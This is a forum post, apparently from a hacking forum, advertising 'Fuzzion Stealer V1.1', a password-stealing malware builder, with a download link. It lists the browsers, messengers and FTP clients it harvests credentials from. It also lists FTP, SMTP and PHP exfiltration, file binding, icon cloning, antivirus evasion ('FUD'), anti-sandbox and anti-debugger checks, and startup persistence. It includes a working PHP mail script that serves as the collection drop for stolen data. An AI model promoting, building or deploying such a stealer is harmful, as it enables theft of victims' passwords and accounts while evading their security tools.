Jump to content
Nytro

Fuzzion Stealer V1.1

Recommended Posts

2lo57w0.jpg

Fetures:

Recovery:

- Firefox All version [3.5 for private]

- chrome [for private]

- internet exploler 7,8 [for private]

- MSN Messenger

- NO-IP

- Steam

- PaltalkScene

- DynDNS

- Yahoo Messenger 8.x,9.x [for private]

- Filezilla

- Pidgin

- Triliant

Sender Options :

- Ftp

- Smtp

- Php

binder options :

- bind many file

- support mp3,exe,etc...

- drop to

- file encrypted

Fileclonner :

- Clone Version Info

- Clone Icon

- Clone Filesize

- FUD Scantime + Runtime :

- All strings are encrypted

- All your inputted data, (FTP, SMTP, PHP) are encrypted.

- All API's encrypted.

- Drop File

- Windows

- System

- Temp

- Mydocument

- Anti Feture

- Sandbox

- Debugger

- Emulator

- Sniffer

- Virtual Machine

- Startup Methode

- Run

- Runservices

- Activex

- Shell

Mail.php

<html>
<body>

<form method="post" action="mail.php">
<input type="text" name="mail" />
<input type="text" name="Subject" />
<input type="text" name="message" />
<input type="submit"/>
</form>

<?php

if (isset($_POST['mail']) and isset($_POST['message'])and isset($_POST['Subject']))
{
$headers ='From: "Fuzzion_Stealer"<Fuzzion_Stealer@hackhound.org>'."\n";
$headers .='Reply-To: Fuzzion@hackhound.org'."\n";
$headers .='Content-Type: text/plain; charset="iso-8859-1"'."\n";
$headers .='Content-Transfer-Encoding: 8bit';
mail($_POST['mail'], $_POST['Subject'], $_POST['message'], $headers);
}

?>

</body>
</html>

Download:

http://www.2shared.com/file/6987556/504fbb36/Fuzzion_Stealer.html

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...